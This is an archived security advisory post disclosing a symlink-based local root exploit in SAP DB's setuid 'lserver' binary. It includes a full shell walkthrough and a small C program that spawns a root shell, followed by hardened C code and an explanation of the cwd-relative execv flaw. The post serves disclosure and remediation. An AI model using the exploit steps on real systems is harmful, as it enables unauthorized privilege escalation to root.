Hey folks,
During an evaluation of the SAP database for linux I located a
security issue in one of their suid binaries. This issue is a symlink
attack against a binary that makes an execve call to a file in your
current directory. The details of this issue are outlined below. You
should be able to exploit this by hand; however, I included a simple exploit.
The alert from SAP is located here:
http://www.sapdb.org/sap_db_alert.htm
This code and alert will be added to http://www.snosoft.com/research
-KF
---------
This local attack upon SAP is based on sapdb-server-linux-32bit-i386-7_3_0_29.tgz.
It is currently unknown if this affects other SAP flavors.
[elguapo@rh8 pgm]$ pwd
/usr/sapdb/depend/pgm
[elguapo@rh8 pgm]$ ls -al lserver
-rwsrwxr-x 1 root sapdb 15673 Oct 22 10:42 lserver
Using ltrace we can see an attempt to run ./lserversrv via execve():
[elguapo@rh8 pgm]$ ltrace ./lserver
__libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c <unfinished ...>
__register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5, 0x4212a2d0) = 0
malloc(10) = 0x0804a200
strcpy(0x0804a200, "./lserver") = 0x0804a200
execv("./lserversrv", 0xbffff994 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
The problem with this execve call is that when looking for "./lserversrv" the lserver
does not check for any symlinks. The abuser can very easily make his own lserversrv.
We are just going to make a directory in /tmp to use for scratch space.
[elguapo@rh8 pgm]$ cd /tmp
[elguapo@rh8 tmp]$ mkdir "snosoft+sapdb=root"
[elguapo@rh8 tmp]$ cd "snosoft+sapdb=root"
Next we make a symlink to the suid binary lserver:
[elguapo@rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver lserver
As we saw above, lserver tries to do the following:
execv("./lserversrv", 0xbffff994 <unfinished ...>
This is easy enough to take advantage of...
[elguapo@rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv
As you can see we have the euid of root at this point in time...
[elguapo@rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver
uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo)
Finishing up the task is trivial from there...
[elguapo@rh8 snosoft+sapdb=root]$ cat > root.c
#include <stdlib.h>
#include <unistd.h>
int main(void){
setuid(0);
setgid(0);
system("/bin/sh");
return 0;
}
[elguapo@rh8 snosoft+sapdb=root]$ cc -o root root.c
[elguapo@rh8 snosoft+sapdb=root]$ cp root lserversrv
[elguapo@rh8 snosoft+sapdb=root]$ ./lserver
sh-2.05b# id
uid=0(root) gid=0(root) groups=500(elguapo)
Copyright SNOSoft Inc. 2002
-KF
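The root cause above is a setuid program executing a cwd-relative path ("./lserversrv"), so whoever controls the current directory controls what runs as root; the symlink to lserver is only the way of choosing that directory. As an added example (written for this archive page, not SAP's code and not part of KF's post), the C below shows the hardened replacement for that execv call: an absolute path built from a fixed install directory, a bare file name with no path components, a non-symlink-following open, an ownership and permission check on the inode actually opened, and exec by descriptor so the checked file and the executed file cannot differ. INSTALL_DIR is taken from the directory listing in the post and is an assumption about where the helper lives; the function names are hypothetical.

```c
#define _GNU_SOURCE          /* for fexecve(), O_NOFOLLOW, O_CLOEXEC on glibc */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Declared explicitly so the example still compiles if the feature macro
   above is shadowed by an earlier include (glibc signature). */
extern int fexecve(int fd, char *const argv[], char *const envp[]);

/* Assumed install directory of the helper, taken from the listing in the
   post; a real deployment may configure this differently. */
#define INSTALL_DIR "/usr/sapdb/depend/pgm"

/* The pattern ltrace exposed: a cwd-relative target, so the unprivileged
   caller picks the directory the setuid process resolves it against. */
static const char *vulnerable_target(void)
{
    return "./lserversrv";
}

/* Hardened: build an absolute path from a fixed directory and a bare file
   name. Returns a pointer to a static buffer, or NULL if the inputs are not
   acceptable (relative dir, empty name, or a name containing '/'). */
const char *resolved_helper_path(const char *dir, const char *name)
{
    static char buf[PATH_MAX];
    if (dir == NULL || dir[0] != '/' || name == NULL || name[0] == '\0')
        return NULL;
    if (strchr(name, '/') != NULL)      /* rejects "../x" and "/tmp/x" alike */
        return NULL;
    int n = snprintf(buf, sizeof buf, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= sizeof buf)
        return NULL;
    return buf;
}

/* A helper is only trusted if it is a regular file owned by root and not
   writable by group or others; anything else could be a local user's file. */
int helper_is_trusted(mode_t mode, uid_t uid)
{
    if (!S_ISREG(mode)) return 0;
    if (uid != 0) return 0;
    if (mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Open without following a symlink, verify the inode that was actually
   opened, then exec by descriptor so there is no check-then-use window.
   Returns -1 on any failure; on success it does not return. */
int launch_helper(const char *dir, const char *name)
{
    const char *path = resolved_helper_path(dir, name);
    if (path == NULL) { errno = EINVAL; return -1; }

    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;

    struct stat st;
    if (fstat(fd, &st) != 0 || !helper_is_trusted(st.st_mode, st.st_uid)) {
        close(fd);
        errno = EACCES;
        return -1;
    }

    char *const argv[] = { (char *)name, NULL };
    /* Fixed, minimal environment: nothing inherited from the caller. */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    /* O_CLOEXEC is safe with fexecve here because the target is an ELF
       binary; an interpreted script would need the descriptor kept open. */
    fexecve(fd, argv, envp);
    close(fd);
    return -1;
}

int main(void)
{
    printf("unsafe target: %s (resolved against the caller's cwd)\n",
           vulnerable_target());
    if (launch_helper(INSTALL_DIR, "lserversrv") != 0)
        perror("launch_helper");   /* expected on a machine without SAP DB */
    return 1;
}
```

The two properties that matter for this class of bug are that the directory is fixed at build or configuration time rather than taken from the process environment or cwd, and that the file executed is the same inode that was inspected. Checking ownership with stat() on the path and then calling execv() on the path would leave the second property to chance.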
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30: Wed Dec 04 2002 - 07:56:21 PST